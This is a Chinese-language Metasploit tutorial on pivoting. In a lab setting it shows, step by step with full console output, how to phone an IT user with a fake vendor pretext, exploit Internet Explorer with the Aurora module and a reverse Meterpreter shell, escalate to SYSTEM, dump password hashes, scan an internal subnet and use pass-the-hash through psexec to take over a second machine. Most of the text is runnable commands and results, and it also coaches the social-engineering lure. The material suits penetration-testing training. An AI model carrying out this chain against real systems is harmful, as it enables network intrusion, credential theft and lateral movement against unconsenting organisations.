透视攻击是使用实例(也称为“工厂”或“立足点”)以能够在网络内部移动的独特技术。基本上,使用第一个折衷方案可以允许甚至协助其他原本无法访问的系统的折衷方案。在这种情况下,我们将使用它来路由来自通常不可路由的网络的流量。
例如,我们是Security-R-U的五分之一。您决定将目标IT部门的用户作为目标。您打电话给用户并声称您来自供应商,并希望他们访问您的网站以下载安全补丁。在您指向他们指向的URL处,正在运行Internet Explorer漏洞。
msf > use exploit/windows/browser/ms10_002_aurora msf exploit(ms10_002_aurora) > show options Module options: Name Current Setting Required Description ---- --------------- -------- ----------- SRVHOST 0.0.0.0 yes The local host to listen on. SRVPORT 8080 yes The local port to listen on. SSL false no Negotiate SSL for incoming connections SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1) URIPATH no The URI to use for this exploit (default is random) Exploit target: Id Name -- ---- 0 Automatic msf exploit(ms10_002_aurora) > set URIPATH / URIPATH => / msf exploit(ms10_002_aurora) > set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp msf exploit(ms10_002_aurora) > set LHOST 192.168.1.101 LHOST => 192.168.1.101 msf exploit(ms10_002_aurora) > exploit -j [*] Exploit running as background job. [*] Started reverse handler on 192.168.1.101:4444 [*] Using URL: http://0.0.0.0:8080/ [*] Local IP: http://192.168.1.101:8080/ [*] Server started. msf exploit(ms10_002_aurora) >
当目标访问我们的恶意URL时,将为我们打开一个Meterpreter会话,以提供对系统的完全访问权限。
msf exploit(ms10_002_aurora) > [*] Sending Internet Explorer "Aurora" Memory Corruption to client 192.168.1.201 [*] Sending stage (749056 bytes) to 192.168.1.201 [*] Meterpreter session 1 opened (192.168.1.101:4444 -> 192.168.1.201:8777) at Mon Dec 06 08:22:29 -0700 2010 msf exploit(ms10_002_aurora) > sessions -l Active sessions =============== Id Type Information Connection -- ---- ----------- ---------- 1 meterpreter x86/win32 XEN-XP-SP2-BARE\Administrator @ XEN-XP-SP2-BARE 192.168.1.101:4444 -> 192.168.1.201:8777 msf exploit(ms10_002_aurora) >
当我们连接到Meterpreter会话时,我们运行ipconfig并看到被利用的系统是双宿主的,这是IT人员之间的常见配置。
msf exploit(ms10_002_aurora) > sessions -i 1 [*] Starting interaction with 1... meterpreter > ipconfig Citrix XenServer PV Ethernet Adapter #2 - Packet Scheduler Miniport Hardware MAC: d2:d6:70:fa:de:65 IP Address : 10.1.13.3 Netmask : 255.255.255.0 MS TCP Loopback interface Hardware MAC: 00:00:00:00:00:00 IP Address : 127.0.0.1 Netmask : 255.0.0.0 Citrix XenServer PV Ethernet Adapter - Packet Scheduler Miniport Hardware MAC: c6:ce:4e:d9:c9:6e IP Address : 192.168.1.201 Netmask : 255.255.255.0 meterpreter >
我们想利用这些新发现的信息来攻击这个额外的网络。Metasploit有一个autoroute计量器脚本,该脚本将使我们能够通过第一台受感染的计算机攻击第二个网络。
meterpreter > run autoroute -h [*] Usage: run autoroute [-r] -s subnet -n netmask [*] Examples: [*] run autoroute -s 10.1.1.0 -n 255.255.255.0 # Add a route to 10.10.10.1/255.255.255.0 [*] run autoroute -s 10.10.10.1 # Netmask defaults to 255.255.255.0 [*] run autoroute -s 10.10.10.1/24 # CIDR notation is also okay [*] run autoroute -p # Print active routing table [*] run autoroute -d -s 10.10.10.1 # Deletes the 10.10.10.1/255.255.255.0 route [*] Use the "route" and "ipconfig" Meterpreter commands to learn about available routes meterpreter > run autoroute -s 10.1.13.0/24 [*] Adding a route to 10.1.13.0/255.255.255.0... [+] Added route to 10.1.13.0/255.255.255.0 via 192.168.1.201 [*] Use the -p option to list all active routes meterpreter > run autoroute -p Active Routing Table ==================== Subnet Netmask Gateway ------ ------- ------- 10.1.13.0 255.255.255.0 Session 1 meterpreter >
现在,我们已经添加了其他路由,我们将升级到SYSTEM,转储密码哈希值,并通过按Ctrl-z来后台进行Meterpreter会话。
meterpreter > getsystem ...got system (via technique 1). meterpreter > run hashdump [*] Obtaining the boot key... [*] Calculating the hboot key using SYSKEY c2ec80f879c1b5dc8d2b64f1e2c37a45... [*] Obtaining the user list and keys... [*] Decrypting user keys... [*] Dumping password hashes... Administrator:500:81cbcea8a9af93bbaad3b435b51404ee:561cbdae13ed5abd30aa94ddeb3cf52d::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: HelpAssistant:1000:9a6ae26408b0629ddc621c90c897b42d:07a59dbe14e2ea9c4792e2f189e2de3a::: SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:ebf9fa44b3204029db5a8a77f5350160::: victim:1004:81cbcea8a9af93bbaad3b435b51404ee:561cbdae13ed5abd30aa94ddeb3cf52d::: meterpreter > Background session 1? [y/N] msf exploit(ms10_002_aurora) >
现在我们需要确定我们发现的第二个网络上是否还有其他系统。我们将使用基本的TCP端口扫描程序来查找端口139和445。
msf exploit(ms10_002_aurora) > use auxiliary/scanner/portscan/tcp msf auxiliary(tcp) > show options Module options: Name Current Setting Required Description ---- --------------- -------- ----------- CONCURRENCY 10 yes The number of concurrent ports to check per host FILTER no The filter string for capturing traffic INTERFACE no The name of the interface PCAPFILE no The name of the PCAP capture file to process PORTS 1-10000 yes Ports to scan (e.g. 22-25,80,110-900) RHOSTS yes The target address range or CIDR identifier SNAPLEN 65535 yes The number of bytes to capture THREADS 1 yes The number of concurrent threads TIMEOUT 1000 yes The socket connect timeout in milliseconds VERBOSE false no Display verbose output msf auxiliary(tcp) > set RHOSTS 10.1.13.0/24 RHOST => 10.1.13.0/24 msf auxiliary(tcp) > set PORTS 139,445 PORTS => 139,445 msf auxiliary(tcp) > set THREADS 50 THREADS => 50 msf auxiliary(tcp) > run [*] 10.1.13.3:139 - TCP OPEN [*] 10.1.13.3:445 - TCP OPEN [*] 10.1.13.2:445 - TCP OPEN [*] 10.1.13.2:139 - TCP OPEN [*] Scanned 256 of 256 hosts (100% complete) [*] Auxiliary module execution completed msf auxiliary(tcp) >
我们在该网络上发现了另外一台开放了端口139和445的计算机,因此我们将尝试通过windows / smb / psexec exploit模块重复使用收集的密码哈希。由于许多公司都使用映像软件,因此本地管理员密码在整个企业中通常是相同的。
msf auxiliary(tcp) > use exploit/windows/smb/psexec msf exploit(psexec) > show options Module options: Name Current Setting Required Description ---- --------------- -------- ----------- RHOST yes The target address RPORT 445 yes Set the SMB service port SMBDomain WORKGROUP no The Windows domain to use for authentication SMBPass no The password for the specified username SMBUser no The username to authenticate as Exploit target: Id Name -- ---- 0 Automatic msf exploit(psexec) > set RHOST 10.1.13.2 RHOST => 10.1.13.2 msf exploit(psexec) > set SMBUser Administrator SMBUser => Administrator msf exploit(psexec) > set SMBPass 81cbcea8a9af93bbaad3b435b51404ee:561cbdae13ed5abd30aa94ddeb3cf52d SMBPass => 81cbcea8a9af93bbaad3b435b51404ee:561cbdae13ed5abd30aa94ddeb3cf52d msf exploit(psexec) > set PAYLOAD windows/meterpreter/bind_tcp PAYLOAD => windows/meterpreter/bind_tcp msf exploit(psexec) > exploit [*] Connecting to the server... [*] Started bind handler [*] Authenticating to 10.1.13.2:445|WORKGROUP as user 'Administrator'... [*] Uploading payload... [*] Created \qNuIKByV.exe... [*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:10.1.13.2[\svcctl] ... [*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:10.1.13.2[\svcctl] ... [*] Obtaining a service manager handle... [*] Creating a new service (UOtrbJMd - "MNYR")... [*] Closing service handle... [*] Opening service... [*] Starting the service... [*] Removing the service... [*] Closing service handle... [*] Deleting \qNuIKByV.exe... [*] Sending stage (749056 bytes) [*] Meterpreter session 2 opened (192.168.1.101-192.168.1.201:0 -> 10.1.13.2:4444) at Mon Dec 06 08:56:42 -0700 2010 meterpreter >
我们的攻击成功了!您可以在上面的输出中看到,我们有一个Meterpreter会话,通过我们现有的192.168.1.201的meterpreter会话连接到10.1.13.2。在我们新近感染的计算机上运行ipconfig表示,我们已经到达了通常无法访问的系统。
meterpreter > ipconfig Citrix XenServer PV Ethernet Adapter Hardware MAC: 22:73:ff:12:11:4b IP Address : 10.1.13.2 Netmask : 255.255.255.0 MS TCP Loopback interface Hardware MAC: 00:00:00:00:00:00 IP Address : 127.0.0.1 Netmask : 255.0.0.0 meterpreter >